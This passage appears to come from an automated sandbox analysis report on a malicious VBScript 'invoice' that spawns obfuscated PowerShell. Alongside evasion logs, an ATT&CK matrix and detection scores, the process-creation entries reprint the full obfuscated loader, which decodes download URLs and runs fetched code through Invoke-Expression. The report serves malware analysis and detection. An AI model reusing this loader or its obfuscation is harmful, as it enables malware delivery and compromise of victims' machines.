Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB0C7A push cs; retf 7_2_07CB0E66
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CBB468 push FFFFFF8Bh; iretd 7_2_07CBB46B
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CBB42F push FFFFFF8Bh; iretd 7_2_07CBB432
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB503A push eax; retf 7_2_07CB5046
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB9F54 push FFFFFF8Bh; iretd 7_2_07CB9F5D
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB0E67 push eax; mov dword ptr [esp], ecx 7_2_07CB0E7C
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB0E67 push cs; retf 7_2_07CB0EE6
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB8E1F push FFFFFF8Bh; iretd 7_2_07CB8E22
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB2E27 push FFFFFF8Bh; iretd 7_2_07CB2E30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB2DEB push FFFFFF8Bh; iretd 7_2_07CB2DF4
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB1C80 push ds; retf 7_2_07CB1EFE
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_07CB9C46 pushfd ; retf 7_2_07CB9C4E
              Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3980
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5935
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7327
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2275
              Source: C:\Windows\System32\wscript.exe TID: 5676 | Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5144 | Thread sleep time: -2767011611056431s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5552 | Thread sleep count: 7327 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5552 | Thread sleep count: 2275 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5480 | Thread sleep time: -2767011611056431s >= -30000s
              Source: wscript.exe, 00000000.00000002.2136621803.0000021ADDAF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
              Source: wscript.exe, 00000000.00000003.2032932781.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136621803.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2037745545.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2135563015.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2032524034.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2136388867.0000021ADBBEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2134467143.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2134759951.0000021ADDB5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2033005568.0000021ADBBC4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2135796132.0000021ADBBEB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2135299220.0000021ADBBEB000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: wscript.exe, 00000000.00000003.2134686892.0000021ADDB6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
              Source: wscript.exe, 00000000.00000003.2134686892.0000021ADDB6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>
              Source: wscript.exe, 00000000.00000003.2134686892.0000021ADDB6F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}7N
              Source: powershell.exe, 00000003.00000002.3438249100.00000266D7812000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
              Source: powershell.exe, 00000007.00000002.3329236621.0000000007A2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 7_2_04C9D6E0 LdrInitializeThunk,LdrInitializeThunk,7_2_04C9D6E0

              HIPS / PFW / Operating System Protection Evasion

              Source: Yara match | File source: amsi64_1600.amsi.csv, type: OTHER
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 1600, type: MEMORYSTR
              Source: Yara match | File source: Process Memory Space: powershell.exe PID: 5572, type: MEMORYSTR
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afrikaans='SUBsTR';$Semiprofanity26++;}$Afrikaans+='ing';Function konstruktive($Metaludlser){$Arbejdernederlaget=$Metaludlser.Length-$Semiprofanity26;For( $Outlimn=4;$Outlimn -lt $Arbejdernederlaget;$Outlimn+=5){$junking+=$Metaludlser.$Afrikaans.'Invoke'( $Outlimn, $Semiprofanity26);}$junking;}function Kreditorselskabs($Programeksempler){ . ($Ecumenicalism) ($Programeksempler);}$blyindholds=konstruktive 'AtlaMimmooDiamz eneiAabelQuitlCasuaAu,i/ res5,uma.Seas0Uroc con(CuriW eveiEmainSu idFiskoTelewS,odsPeng MedlN ,umTGale Bomb1Cone0c.ff.Adj 0Incu;pa.t Is,eWByggi.ndfnEffe6rel.4 sp,;B.tt ,uggxGome6Ency4 Unc;Fuci Unhar Appv nch: uja1Semi2Dayf1Opri.Solu0Awni)tr.l EtikGungieHeavcSmukkEnfooTors/Skjo2Tppe0Hall1 Bio0Glid0Batt1gast0Sa,g1Osmi Do FSuggiOplyr SkrePachf AndoBavixresc/ Mlk1for 2Sort1Vris.Skum0Shel ';$Begazes=konstruktive 'Pr.sUA resEc ieS unrE.tl-SvamATevagPlo eF,ern .uvtFu d ';$Ideogrammerne=konstruktive ' S,ahOvert InatUdjvpRestsByst:Fin /Fer,/Ma,taDiffdHugojNonruSew,nLytetMeloi EftaStre.MustrDi.kuMu,i.For,cGil.oToilmS ur/P.rtwNedspUnob-GonaiSnornKlimc FodlStyruspard ,coeCystsSnek/Ga giSolam IntgB,op/,utsARetspTrempBroolOmbyiO.spa Ln.nHum.c Ge eHomesBlod.MakrsPe,rmBeskiGeni>Nat,hDe itDecatBolspDeessspol:,upe/Inco/UnmoaL,esmRuddbMe ny Penv OnoespadrSnd cTraneGr.n.Bac,cforloForsm med/AuteAShempJawfpFoehl C.ri Fe,asyrln QuicAnsteA.iosBich.PennsPaabm Doli or ';$Toddyskes=konstruktive 'A,um> Tra ';$Ecumenicalism=konstruktive 'e asiK.lleDomix ilr ';$Drsprkkernes='Nonnutritiousness';$Telemestre = konstruktive 'Opsae Ovec inrhl,tco Se, Con%Om raD.umpsvvepAfstdHuipa RattHermaCel.% opn\BogbSDiskpFrili BlisOad eK.llf Sneiinv skok,kUret.PrecP ,anuHarlr erb Fejl&Ta p&Hege Ky.ieNonec VedhI.veoU,de Prot Li. 
';Kreditorselskabs (konstruktive 'Inde$ContgMa clUdeloregabRoseaAmbrl Gra:.iroaKalinLetvfMemblDigiyCituvKlapnAmniiGtefnFla,gVand=Genn(TurtcBlommOctadSym, B eb/BicecAnni Un.e$NiteT Rh.eTea.lB.dre Betm O.veFortsSviptOrdlr An.eDr n)Unsl ');Kreditorselskabs (konstruktive 'Blan$Ferrg,uthlU.saoJejub,nigaC.rnlFind:ResoVS nnec,annTriqaVingl,inenNoneeCouns orfsSkif=Apos$PostI ,aadRen,eSummoBarngPilar BanaDe.emA,famFoure Skyr Syln SoaeMult. G,asBrdrpOmarlIn.oi UdbtRadi(Sten$NapkTFjero ,ysdmambdOverySacesPcflkLivieAktusAnt.)Strb ');Kreditorselskabs (konstruktive 'Frug[ iluNVejre P.utB.tr.FolkSStope MycrMarivEn,yiprfactraneArtiP O.soSammiJernnDicetNeo MAk,iaExpln benahaang Brne,sparStt,]Figu: Ene:bortSRetse ovic K,auLater .iviassetVelgysmerP BraroveroGloptVanqoUn.acBlowoSamslPetr Me,l=Fane T k[BenzNGuare .iptNonv.fienSKa eeForscProluP ftrGaloi Solt Desy osePSl.nrCarboSkurtCorooF,rsc PoloKl,alNat.TRegny racpVaadeSpin]F,ti:kine:SmkkTplanlCakesDarw1Ana,2over ');$Ideogrammerne=$Venalness[0];$Pickett= (konstruktive 'Palf$ SkogFraclCou ohospbTeraaDelilBrud:SavoKAffao Habn P.lk S.uu vakr.seurGl.ne ChanSemic
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Spisefisk.Pur && echo t"
              Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afrikaans='substr';$semiprofanity26++;}$afrikaans+='ing';function konstruktive($metaludlser){$arbejdernederlaget=$metaludlser.length-$semiprofanity26;for( $outlimn=4;$outlimn -lt $arbejdernederlaget;$outlimn+=5){$junking+=$metaludlser.$afrikaans.'invoke'( $outlimn, $semiprofanity26);}$junking;}function kreditorselskabs($programeksempler){ . ($ecumenicalism) ($programeksempler);}$blyindholds=konstruktive 'atlamimmoodiamz eneiaabelquitlcasuaau,i/ res5,uma.seas0uroc con(curiw eveiemainsu idfiskotelews,odspeng medln ,umtgale bomb1cone0c.ff.adj 0incu;pa.t is,ewbyggi.ndfneffe6rel.4 sp,;b.tt ,uggxgome6ency4 unc;fuci unhar appv nch: uja1semi2dayf1opri.solu0awni)tr.l etikgungieheavcsmukkenfootors/skjo2tppe0hall1 bio0glid0batt1gast0sa,g1osmi do fsuggioplyr skrepachf andobavixresc/ mlk1for 2sort1vris.skum0shel ';$begazes=konstruktive 'pr.sua resec ies unre.tl-svamatevagplo ef,ern .uvtfu d ';$ideogrammerne=konstruktive ' s,ahovert inatudjvprestsbyst:fin /fer,/ma,tadiffdhugojnonrusew,nlytetmeloi eftastre.mustrdi.kumu,i.for,cgil.otoilms ur/p.rtwnedspunob-gonaisnornklimc fodlstyruspard ,coecystssnek/ga gisolam intgb,op/,utsaretsptrempbroolombyio.spa ln.nhum.c ge ehomesblod.makrspe,rmbeskigeni>nat,hde itdecatbolspdeessspol:,upe/inco/unmoal,esmruddbme ny penv onoespadrsnd ctranegr.n.bac,cforloforsm med/auteashempjawfpfoehl c.ri fe,asyrln quicanstea.iosbich.pennspaabm doli or ';$toddyskes=konstruktive 'a,um> tra ';$ecumenicalism=konstruktive 'e asik.lledomix ilr ';$drsprkkernes='nonnutritiousness';$telemestre = konstruktive 'opsae ovec inrhl,tco se, con%om rad.umpsvvepafstdhuipa ratthermacel.% opn\bogbsdiskpfrili blisoad ek.llf sneiinv skok,kuret.precp ,anuharlr erb fejl&ta p&hege ky.ienonec vedhi.veou,de prot li. 
';kreditorselskabs (konstruktive 'inde$contgma cludeloregabroseaambrl gra:.iroakalinletvfmembldigiycituvklapnamniigtefnfla,gvand=genn(turtcblommoctadsym, b eb/bicecanni un.e$nitet rh.etea.lb.dre betm o.vefortssviptordlr an.edr n)unsl ');kreditorselskabs (konstruktive 'blan$ferrg,uthlu.saojejub,nigac.rnlfind:resovs nnec,anntriqavingl,inennoneecouns orfsskif=apos$posti ,aadren,esummobarngpilar banade.ema,famfoure skyr syln soaemult. g,asbrdrpomarlin.oi udbtradi(sten$napktfjero ,ysdmambdoverysacespcflklivieaktusant.)strb ');kreditorselskabs (konstruktive 'frug[ ilunvejre p.utb.tr.folksstope mycrmariven,yiprfactraneartip o.sosammijernndicetneo mak,iaexpln benahaang brne,sparstt,]figu: ene:bortsretse ovic k,aulater .iviassetvelgysmerp braroverogloptvanqoun.acblowosamslpetr me,l=fane t k[benznguare .iptnonv.fienska eeforscprolup ftrgaloi solt desy osepsl.nrcarboskurtcoroof,rsc polokl,alnat.tregny racpvaadespin]f,ti:kine:smkktplanlcakesdarw1ana,2over ');$ideogrammerne=$venalness[0];$pickett= (konstruktive 'palf$ skogfraclcou ohospbteraadelilbrud:savokaffao habn p.lk s.uu vakr.seurgl.ne chansemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "if (${host}.currentuiculture) {$afrikaans='substr';$semiprofanity26++;}$afrikaans+='ing';function konstruktive($metaludlser){$arbejdernederlaget=$metaludlser.length-$semiprofanity26;for( $outlimn=4;$outlimn -lt $arbejdernederlaget;$outlimn+=5){$junking+=$metaludlser.$afrikaans.'invoke'( $outlimn, $semiprofanity26);}$junking;}function kreditorselskabs($programeksempler){ . ($ecumenicalism) ($programeksempler);}$blyindholds=konstruktive 'atlamimmoodiamz eneiaabelquitlcasuaau,i/ res5,uma.seas0uroc con(curiw eveiemainsu idfiskotelews,odspeng medln ,umtgale bomb1cone0c.ff.adj 0incu;pa.t is,ewbyggi.ndfneffe6rel.4 sp,;b.tt ,uggxgome6ency4 unc;fuci unhar appv nch: uja1semi2dayf1opri.solu0awni)tr.l etikgungieheavcsmukkenfootors/skjo2tppe0hall1 bio0glid0batt1gast0sa,g1osmi do fsuggioplyr skrepachf andobavixresc/ mlk1for 2sort1vris.skum0shel ';$begazes=konstruktive 'pr.sua resec ies unre.tl-svamatevagplo ef,ern .uvtfu d ';$ideogrammerne=konstruktive ' s,ahovert inatudjvprestsbyst:fin /fer,/ma,tadiffdhugojnonrusew,nlytetmeloi eftastre.mustrdi.kumu,i.for,cgil.otoilms ur/p.rtwnedspunob-gonaisnornklimc fodlstyruspard ,coecystssnek/ga gisolam intgb,op/,utsaretsptrempbroolombyio.spa ln.nhum.c ge ehomesblod.makrspe,rmbeskigeni>nat,hde itdecatbolspdeessspol:,upe/inco/unmoal,esmruddbme ny penv onoespadrsnd ctranegr.n.bac,cforloforsm med/auteashempjawfpfoehl c.ri fe,asyrln quicanstea.iosbich.pennspaabm doli or ';$toddyskes=konstruktive 'a,um> tra ';$ecumenicalism=konstruktive 'e asik.lledomix ilr ';$drsprkkernes='nonnutritiousness';$telemestre = konstruktive 'opsae ovec inrhl,tco se, con%om rad.umpsvvepafstdhuipa ratthermacel.% opn\bogbsdiskpfrili blisoad ek.llf sneiinv skok,kuret.precp ,anuharlr erb fejl&ta p&hege ky.ienonec vedhi.veou,de prot li. 
';kreditorselskabs (konstruktive 'inde$contgma cludeloregabroseaambrl gra:.iroakalinletvfmembldigiycituvklapnamniigtefnfla,gvand=genn(turtcblommoctadsym, b eb/bicecanni un.e$nitet rh.etea.lb.dre betm o.vefortssviptordlr an.edr n)unsl ');kreditorselskabs (konstruktive 'blan$ferrg,uthlu.saojejub,nigac.rnlfind:resovs nnec,anntriqavingl,inennoneecouns orfsskif=apos$posti ,aadren,esummobarngpilar banade.ema,famfoure skyr syln soaemult. g,asbrdrpomarlin.oi udbtradi(sten$napktfjero ,ysdmambdoverysacespcflklivieaktusant.)strb ');kreditorselskabs (konstruktive 'frug[ ilunvejre p.utb.tr.folksstope mycrmariven,yiprfactraneartip o.sosammijernndicetneo mak,iaexpln benahaang brne,sparstt,]figu: ene:bortsretse ovic k,aulater .iviassetvelgysmerp braroverogloptvanqoun.acblowosamslpetr me,l=fane t k[benznguare .iptnonv.fienska eeforscprolup ftrgaloi solt desy osepsl.nrcarboskurtcoroof,rsc polokl,alnat.tregny racpvaadespin]f,ti:kine:smkktplanlcakesdarw1ana,2over ');$ideogrammerne=$venalness[0];$pickett= (konstruktive 'palf$ skogfraclcou ohospbteraadelilbrud:savokaffao habn p.lk s.uu vakr.seurgl.ne chansemic
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
              Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 221 Scripting | Valid Accounts | 11 Windows Management Instrumentation | 221 Scripting | 11 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | 21 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 DLL Side-Loading | 21 Virtualization/Sandbox Evasion | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 1 Exploitation for Client Execution | Logon Script (Windows) | Logon Script (Windows) | 11 Process Injection | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 2 PowerShell | Login Hook | Login Hook | 1 Deobfuscate/Decode Files or Information | NTDS | 1 Application Window Discovery | Distributed Component Object Model | Input Capture | 13 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 2 Obfuscated Files or Information | LSA Secrets | 1 File and Directory Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Software Packing | Cached Domain Credentials | 13 System Information Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Source | Detection | Scanner | Label
INVOICE_DF76K.vbs | 5% | Virustotal
No Antivirus matches
Source | Detection | Scanner | Label
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://crl.m | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://aka.ms/pscore6lB | 0% | URL Reputation | safe
http://crl.microsoft | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
